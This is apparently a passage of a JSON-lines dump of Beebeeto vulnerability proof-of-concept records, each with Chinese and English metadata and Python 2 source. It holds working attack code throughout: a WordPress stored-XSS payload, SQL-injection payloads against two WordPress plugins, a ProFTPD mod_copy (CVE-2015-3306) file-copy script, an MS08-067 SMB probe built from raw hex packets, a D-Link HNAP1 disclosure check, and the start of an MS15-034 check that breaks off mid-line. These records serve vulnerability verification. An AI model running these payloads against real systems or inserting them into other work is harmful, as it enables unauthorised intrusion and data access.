\u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Wordpress',\r\n            'vul_version': ['<4.1.2'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['Wordpress\u5b58\u50a8\u578bXSS\u6f0f\u6d1e', '/wp-comments-post.php', 'Cross Site Scripting', 'php'],\r\n            'desc': '''\r\n                    \u8be5\u95ee\u9898\u7531 mysql \u7684\u4e00\u4e2a\u7279\u6027\u5f15\u8d77\uff0c\u5728 mysql \u7684 utf8 \u5b57\u7b26\u96c6\u4e2d\uff0c\u4e00\u4e2a\u5b57\u7b26\u75311~3\u4e2a\u5b57\u8282\u7ec4\u6210\uff0c\r\n                    \u5bf9\u4e8e\u5927\u4e8e3\u4e2a\u5b57\u8282\u7684\u5b57\u7b26\uff0cmysql \u4f7f\u7528\u4e86 utf8mb4 \u7684\u5f62\u5f0f\u6765\u5b58\u50a8\u3002\r\n                    \u5982\u679c\u6211\u4eec\u5c06\u4e00\u4e2a utf8mb4 \u5b57\u7b26\u63d2\u5165\u5230 utf8 \u7f16\u7801\u7684\u5217\u4e2d\uff0c\u90a3\u4e48\u5728mysql\u7684\u975estrict mode\u4e0b\uff0c\r\n                    \u4ed6\u4f1a\u5c06\u540e\u9762\u7684\u5185\u5bb9\u622a\u65ad\uff0c\u5bfc\u81f4\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u8fd9\u4e00\u7f3a\u9677\u5b8c\u6210 XSS \u653b\u51fb\u3002\r\n                    ''',\r\n            'references': [\r\n                    'https://wordpress.org/news/2015/04/wordpress-4-1-2/',\r\n                    'https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/',\r\n                           ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        target = args['options']['target']\r\n        verify_url =  target + \"/wp-comments-post.php\"\r\n        rand_str = lambda length: ''.join(random.sample(string.letters, length))\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n            print '[*] Checking...'\r\n        try:\r\n            post_id = re.search(r'post-(?P<post_id>[\\d]+)',\r\n                                requests.get(target).content).group('post_id')\r\n        except:\r\n            if args['options']['verbose']:\r\n                print '[-] Not WordPress'\r\n            return args\r\n        ttys = \"test<blockquote cite='%s onmouseover=alert(1)// \\xD8\\x34\\xDF\\x06'>\"\r\n        flag = rand_str(10)\r\n        payload = {\r\n            'author': rand_str(10),\r\n            'email': '%s@%s.com' % (rand_str(10), rand_str(3)),\r\n            'url': 'http://www.beebeeto.com',\r\n            'comment': ttys % flag,\r\n            'comment_post_ID': post_id,\r\n            'comment_parent': 0,\r\n        }\r\n        if args['options']['verbose']:\r\n            print '[*] Send Payload: %s' % payload['comment']\r\n        content = requests.post(verify_url, data=payload).content\r\n        if '<blockquote cite=&#8217;%s onmouseover=alert(1)' % flag in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = '%s/?p=%s' % (target, post_id)\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u8be5\u95ee\u9898\u7531 mysql \u7684\u4e00\u4e2a\u7279\u6027\u5f15\u8d77\uff0c\u5728 mysql \u7684 utf8 \u5b57\u7b26\u96c6\u4e2d\uff0c\u4e00\u4e2a\u5b57\u7b26\u75311~3\u4e2a\u5b57\u8282\u7ec4\u6210\uff0c\r\n\u5bf9\u4e8e\u5927\u4e8e3\u4e2a\u5b57\u8282\u7684\u5b57\u7b26\uff0cmysql \u4f7f\u7528\u4e86 utf8mb4 \u7684\u5f62\u5f0f\u6765\u5b58\u50a8\u3002\r\n\u5982\u679c\u6211\u4eec\u5c06\u4e00\u4e2a utf8mb4 \u5b57\u7b26\u63d2\u5165\u5230 utf8 \u7f16\u7801\u7684\u5217\u4e2d\uff0c\u90a3\u4e48\u5728mysql\u7684\u975estrict mode\u4e0b\uff0c\r\n\u4ed6\u4f1a\u5c06\u540e\u9762\u7684\u5185\u5bb9\u622a\u65ad\uff0c\u5bfc\u81f4\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u8fd9\u4e00\u7f3a\u9677\u5b8c\u6210 XSS \u653b\u51fb\u3002", "app_name": "WordPress", "id": "poc-2015-0092", "layer4_protocol": null}
+{"create_date": "2015-04-24 00:15:36", "name": "D-link DIR-890L /HNAP1 \u672a\u6388\u6743\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "D-link DIR-890L\u7cfb\u7edf\u6f0f\u6d1e,/HNAP1\u6f0f\u6d1e,\u8def\u7531\u5668\u6f0f\u6d1ePOC", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0090',\r\n            'name': 'D-link DIR-890L /HNAP1 \u672a\u6388\u6743\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2015-04-24',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'D-link',\r\n            'vul_version': ['DIR-890L'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['D-link DIR-890L\u7cfb\u7edf\u6f0f\u6d1e', '/HNAP1\u6f0f\u6d1e', '\u8def\u7531\u5668\u6f0f\u6d1ePOC'],\r\n            'desc': 'D_link /HNAP1 unauthenticated remote query information',\r\n            'references': ['http://www.freebuf.com/vuls/64521.html',\r\n                           'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/'],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = '%s/HNAP1/' % args['options']['target']\r\n        soap = {'SOAPAction': '\"http://purenetworks.com/HNAP1/GetWanSettings\"'}\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        req = requests.get(verify_url, headers=soap)\r\n        if req.status_code == 200 and 'xmlns:soap' in req.content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "D-LINK", "id": "poc-2015-0090", "layer4_protocol": null}
+{"create_date": "2015-04-22 13:55:00", "name": "WordPress NEX-Forms 3.0 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "Sh4dow", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165\u6f0f\u6d1e", "tag": "WordPress SQL\u6ce8\u5165\u6f0f\u6d1e,NEX-Forms\u63d2\u4ef6\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport time\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0089',\r\n            'name': 'WordPress NEX-Forms 3.0 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'Sh4dow',\r\n            'create_date': '2015-04-22',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'WordPress',\r\n            'vul_version': ['3.0'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['WordPress SQL\u6ce8\u5165\u6f0f\u6d1e', 'NEX-Forms\u63d2\u4ef6\u6f0f\u6d1e', 'php'],\r\n            'desc': '''\r\n                    There are sql injection vulnerabilities in NEX-Forms Plugin\r\n                    which could allow the attacker to execute sql queries into database\r\n                    ''',\r\n            'references': ['https://www.exploit-db.com/exploits/36800/',\r\n                           ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target']\r\n        payloads = {'/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)',\r\n                    '/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1 and sleep(5)',\r\n                    '/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 and sleep(5)'\r\n                    }\r\n        for payload in payloads:\r\n            verify_url += payload\r\n            start_time = time.time()\r\n            if args['options']['verbose']:\r\n                print '[*]Request URL ' + verify_url\r\n            req = requests.get(verify_url).content\r\n            if time.time() - start_time > 5:\r\n                args['options']['success'] = True\r\n                args['poc_ret']['vul_url'] = verify_url\r\n                break\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "There are sql injection vulnerabilities in NEX-Forms Plugin\r\nwhich could allow the attacker to execute sql queries into database", "app_name": "WordPress", "id": "poc-2015-0089", "layer4_protocol": null}
+{"create_date": "2015-04-20 22:27:48", "name": "ProFTPD <=1.3.5 mod_copy \u672a\u6388\u6743\u6587\u4ef6\u590d\u5236\u6f0f\u6d1e(CVE-2015-3306) POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Evi1m0", "rank": 4, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "ProFTPD\u6f0f\u6d1e,mod_copy\u6f0f\u6d1e,CVE-2015-3306", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport random\r\nimport telnetlib\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http import http\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0088',\r\n            'name': 'ProFTPD <=1.3.5 mod_copy \u672a\u6388\u6743\u6587\u4ef6\u590d\u5236\u6f0f\u6d1e(CVE-2015-3306) POC',\r\n            'author': 'evi1m0',\r\n            'create_date': '2015-04-20',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'ftp',\r\n            'port': [21],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'ProFTPD',\r\n            'vul_version': ['<=1.3.5'],\r\n            'type': 'Other',\r\n            'tag': ['ProFTPD\u6f0f\u6d1e', 'mod_copy\u6f0f\u6d1e', 'CVE-2015-3306'],\r\n            'desc': '''\r\n                    This candidate has been reserved by an organization or individual that will use it when announcing\r\n                    a new security problem. When the candidate has been publicized, the details for this candidate will be\r\n                    provided.\r\n                    ''',\r\n            'references': ['http://bugs.proftpd.org/show_bug.cgi?id=4169',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        ip = http.transform_target_ip(http.normalize_url(args['options']['target']))\r\n        if args['options']['verbose']:\r\n            print '[*] {} Connecting...'.format(ip)\r\n        tn = telnetlib.Telnet(ip, port=21, timeout=15)\r\n        tn.write('site help\\r\\n')\r\n        tn.write('quit\\n')\r\n        status = tn.read_all()\r\n        if 'CPTO' in status and 'CPFR' in status:\r\n            if args['options']['verbose']:\r\n                print '[*] Find CPTO & CPFR'\r\n            tn = telnetlib.Telnet(ip, port=21, timeout=15)\r\n            filename_tmp = '/tmp/evi1m0_%s.sh'%random.randint(1, 1000)\r\n            tn.write('site cpto evi1m0@beebeeto\\n')\r\n            tn.write('site cpfr /proc/self/fd/3\\n')\r\n            tn.write('site cpto %s\\n'%filename_tmp)\r\n            tn.write('quit\\n')\r\n            result = tn.read_all()\r\n            if 'Copy successful' in result:\r\n                args['success'] = True\r\n                args['poc_ret']['vul_target'] = ip\r\n                args['poc_ret']['filename'] = filename_tmp\r\n        return args\r\n\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "This candidate has been reserved by an organization or individual that will use it when announcing\r\na new security problem. When the candidate has been publicized, the details for this candidate will be\r\nprovided.", "app_name": "ProFTPD", "id": "poc-2015-0088", "layer4_protocol": null}
+{"create_date": "2015-04-20 18:07:05", "name": "Wordpress Ajax Store Locator <= 1.2 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "WordPress\u63d2\u4ef6\u6f0f\u6d1e,/wp-admin/admin-ajax.php,SQL Injection,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0087',\r\n            'name': 'Wordpress Ajax Store Locator <= 1.2 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': '1024',\r\n            'create_date': '2015-04-20',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'WordPress',\r\n            'vul_version': ['<=1.2'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['WordPress\u63d2\u4ef6\u6f0f\u6d1e', '/wp-admin/admin-ajax.php', 'SQL Injection', 'php'],\r\n            'desc': 'The \"sl_dal_searchlocation_cbf\" ajax function is affected from SQL Injection vulnerability',\r\n            'references': ['https://www.exploit-db.com/exploits/36777/'],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        url = args['options']['target']\r\n        payload = ('wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore'\r\n                   '&Location=Social&StoreLocation=1~1+UNION+SELECT+1,2,3,4,md5(233),6,7,8,9,10'\r\n                   ',11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39--')\r\n        verify_url = url + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = requests.get(url).content\r\n        if 'e165421110ba03099a1c0393373c5b43' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "The \"sl_dal_searchlocation_cbf\" ajax function is affected from SQL Injection vulnerability", "app_name": "WordPress", "id": "poc-2015-0087", "layer4_protocol": null}
+{"create_date": "2015-04-19 20:11:06", "name": "MS08-067 NetAPI32.dll \u8fdc\u7a0b\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e(CVE-2008-4250) POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "\u7f13\u51b2\u533a\u6ea2\u51fa", "tag": "Windows\u6f0f\u6d1e,NetAPI32.dll\u6f0f\u6d1e,CVE-2008-4250,ms08-067", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport socket\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http import http\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0085',\r\n            'name': 'MS08-067 NetAPI32.dll \u8fdc\u7a0b\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e(CVE-2008-4250) POC',\r\n            'author': 'tmp',\r\n            'create_date': '2015-04-18',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'SMB',\r\n            'port': [445],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Windows',\r\n            'vul_version': ['*'],\r\n            'type': 'Buffer Overflow',\r\n            'tag': ['Windows\u6f0f\u6d1e', 'NetAPI32.dll\u6f0f\u6d1e', 'CVE-2008-4250', 'ms08-067'],\r\n            'desc': '''\r\n                    MS08-067\u6f0f\u6d1e\u7684\u5168\u79f0\u4e3a\u201cWindows Server\u670d\u52a1RPC\u8bf7\u6c42\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\u201d\uff0c\u5982\u679c\u7528\u6237\u5728\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u4e0a\u6536\u5230\u7279\u5236\u7684 RPC\r\n                    \u8bf7\u6c42\uff0c\u5219\u8be5\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u3002 \u5728 Microsoft Windows 2000\u3001Windows XP \u548c Windows Server 2003 \u7cfb\u7edf\u4e0a\uff0c\r\n                    \u653b\u51fb\u8005\u53ef\u80fd\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u5373\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u8fd0\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u6b64\u6f0f\u6d1e\u53ef\u7528\u4e8e\u8fdb\u884c\u8815\u866b\u653b\u51fb\u3002\r\n                    -----\r\n                    This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service.\r\n                    This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to\r\n                    prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to\r\n                    handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This\r\n                    is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in\r\n                    development.\r\n                    ''',\r\n            'references': ['https://labs.portcullis.co.uk/tools/ms08-067-check/',\r\n                           'https://technet.microsoft.com/en-us/library/security/ms08-067.aspx'],\r\n        },\r\n    }\r\n\r\n\r\n    def _init_user_parser(self):  # \u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n        self.user_parser.add_option('-p','--port',\r\n                                    action='store', dest='port', type=int, default=445,\r\n                                    help='request port.')\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        ip = http.transform_target_ip(http.normalize_url(args['options']['target']))\r\n        port = args['options']['port']\r\n        payload = [\r\n            ('00000045ff534d427200000000000008000000000000000000000000ffff00000000000000220'\r\n             '0024e54204c4d20302e31320002534d4220322e3030320002534d4220322e3f3f3f00').decode('hex'),\r\n            ('00000088ff534d427300000000080048000000000000000000000000ffffc42b000000000cff0'\r\n             '0000000f0020001000000000042000000000044c000804d00604006062b0601050502a0363034'\r\n             'a00e300c060a2b06010401823702020aa22204204e544c4d5353500001000000050288a000000'\r\n             '000000000000000000000000000556e69780053616d626100').decode('hex'),\r\n            ('00000096ff534d427300000000080048000000000000000000000000ffffc42b010800000cff0'\r\n             '0000000f0020001000000000050000000000044c000805b00a14e304ca24a04484e544c4d5353'\r\n             '50000300000000000000480000000000000048000000000000004000000000000000400000000'\r\n             '8000800400000000000000048000000050288a04e0055004c004c00556e69780053616d626100').decode('hex'),\r\n            '00000047ff534d427500000000080048000000000000000000000000ffffc42b0108000004ff000000000001001c0000'.decode('hex'),\r\n            ('0000005cff534d42a2000000001801480000000000000000000000000108c42b0108000018ff0'\r\n             '00000000800160000000000000003000000000000000000000080000000010000000100000040'\r\n             '000000020000000009005c62726f7773657200').decode('hex'),\r\n            ('00000092ff534d4225000000000801480000000000000000000000000108c42b0108000010000'\r\n             '048000004e0ff0000000000000000000000004a0048004a000200260000404f005c504950455c'\r\n             '0005000b03100000004800000001000000b810b810000000000100000000000100c84f324b701'\r\n             '6d30112785a47bf6ee18803000000045d888aeb1cc9119fe808002b10486002000000').decode('hex'),\r\n            ('000000beff534d4225000000000801480000000000000000000000000108c42b0108000010000'\r\n             '074000004e0ff0000000000000000000000004a0074004a000200260000407b005c504950455c'\r\n             '00050000031000000074000000010000000000000000002000000002000100000000000000010'\r\n             '000000000aaaa0e000000000000000e0000005c00410041004100410041005c002e002e005c00'\r\n             '46004200560000000500000000000000050000005c004600420056000000aaaa0100000000000000').decode('hex'),\r\n            ]\r\n\r\n        def setuserid(userid,data):\r\n            return data[:32]+userid+data[34:]\r\n        def settreeid(treeid,data):\r\n            return data[:28]+treeid+data[30:]\r\n        def setfid(fid,data):\r\n            return data[:67]+fid+data[69:]\r\n        if args['options']['verbose']:\r\n            print '[*] Connect {}:{}'.format(ip,port)\r\n        s = socket.socket()\r\n        s.connect((ip,port))\r\n        s.send(payload[0])\r\n        s.recv(1024)\r\n        s.send(payload[1])\r\n        data = s.recv(1024)\r\n        userid = data[32:34]\r\n        s.send(setuserid(userid,payload[2]))\r\n        s.recv(1024)\r\n        data = setuserid(userid,payload[3])\r\n        path = '\\\\\\\\%s\\\\IPC$\\x00' % ip\r\n        path = path + (26-len(path))*'\\x3f'+'\\x00'\r\n        data = data + path\r\n        s.send(data)\r\n        data = s.recv(1024)\r\n        tid = data[28:30]\r\n        s.send(settreeid(tid,setuserid(userid,payload[4])))\r\n        data = s.recv(1024)\r\n        fid = data[42:44]\r\n        s.send(setfid(fid,settreeid(tid,setuserid(userid,payload[5]))))\r\n        s.recv(1024)\r\n        s.send(setfid(fid,settreeid(tid,setuserid(userid,payload[6]))))\r\n        data = s.recv(1024)\r\n        if data[9:13]=='\\x00'*4:\r\n            print \"[+] Looks Vulnerability!\"\r\n            args['success'] = True\r\n            args['poc_ret']['vulnerability'] = '%s:%d' % (ip, port)\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "MS08-067\u6f0f\u6d1e\u7684\u5168\u79f0\u4e3a\u201cWindows Server\u670d\u52a1RPC\u8bf7\u6c42\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\u201d\uff0c\u5982\u679c\u7528\u6237\u5728\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u4e0a\u6536\u5230\u7279\u5236\u7684 RPC\r\n\u8bf7\u6c42\uff0c\u5219\u8be5\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u3002 \u5728 Microsoft Windows 2000\u3001Windows XP \u548c Windows Server 2003 \u7cfb\u7edf\u4e0a\uff0c\r\n\u653b\u51fb\u8005\u53ef\u80fd\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u5373\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u8fd0\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u6b64\u6f0f\u6d1e\u53ef\u7528\u4e8e\u8fdb\u884c\u8815\u866b\u653b\u51fb\u3002\r\n-----\r\nThis module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service.\r\nThis module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to\r\nprevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to\r\nhandle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This\r\nis just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in\r\ndevelopment.", "app_name": "Windows", "id": "poc-2015-0085", "layer4_protocol": null}
+{"create_date": "2015-04-15 16:31:02", "name": "IIS HTTP.sys \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2015-1635) POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "user1018", "rank": 6, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "IIS\u6f0f\u6d1e,HTTP.sys\u6f0f\u6d1e,CVE-2015-1635,ms15-034", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport socket\r\nimport random\r\nimport urlparse\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0081',\r\n            'name': 'IIS HTTP.sys \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2015-1635) POC',\r\n            'author': 'user1018',\r\n            'create_date': '2015-04-15',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'IIS',\r\n            'vul_version': ['>7.0'],\r\n            'type': 'Code Execution',\r\n            'tag': ['IIS\u6f0f\u6d1e', 'HTTP.sys\u6f0f\u6d1e', 'CVE-2015-1635', 'ms15-034'],\r\n            'desc': '''\r\n                    \u5f71\u54cd\u8303\u56f4:\r\n                        Windows7\r\n                        Windows8\r\n                        Windows server 2008\r\n                        Windows server 2012\r\n                    \u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u6f0f\u6d1e\u5b58\u5728\u4e8e HTTP \u534f\u8bae\u5806\u6808 (HTTP.sys) \u4e2d\uff0c\u5f53 HTTP.sys \u672a\u6b63\u786e\u5206\u6790\u7ecf\u7279\u6b8a\u8bbe\u8ba1\u7684 HTTP \u8bf7\u6c42\r\n                    \u65f6\u4f1a\u5bfc\u81f4\u6b64\u6f0f\u6d1e\u3002 \u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u7cfb\u7edf\u5e10\u6237\u7684\u4e0a\u4e0b\u6587\u4e2d\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\n                    \u82e5\u8981\u5229\u7528\u6b64\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u5fc5\u987b\u5c06\u7ecf\u7279\u6b8a\u8bbe\u8ba1\u7684 HTTP \u8bf7\u6c42\u53d1\u9001\u5230\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002 \u901a\u8fc7\u4fee\u6539 Windows HTTP \u5806\u6808\u5904\u7406\r\n                    \u8bf7\u6c42\u7684\u65b9\u5f0f\uff0c\u5b89\u88c5\u66f4\u65b0\u53ef\u4ee5\u4fee\u590d\u6b64\u6f0f\u6d1e\u3002\r\n                    ''',\r\n            'references': ['https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx',\r\n                           'http://bobao.360.cn/news/detail/1435.html'],\r\n        },\r\n    }\r\n\r\n\r\n    def _init_user_parser(self):  # \u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n        self.user_parser.add_option('-p','--port',\r\n                                    action='store', dest='port', type=int, default=80,\r\n                                    help='request port.')\r\n        self.user_parser.add_option('--timeout',\r\n                                    action='store', dest='timeout', type=int, default=5,\r\n                                    help='request timeout.')\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        target = args['options']['target']\r\n        port = args['options']['port']\r\n        timeout = args['options']['timeout']\r\n        if urlparse.urlparse(target).netloc == '':\r\n            target = urlparse.urlparse(target).path\r\n        else:\r\n            target = socket.gethostbyname(urlparse.urlparse(target).netloc)\r\n            \r\n        headers = {\r\n            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',\r\n        }\r\n        \r\n        if port == 443:\r\n            url = 'https://%s:%d' % (target, port)\r\n        else:\r\n            url = 'http://%s:%d' % (target, port)\r\n        r = requests.get(url, verify=False, headers=headers, 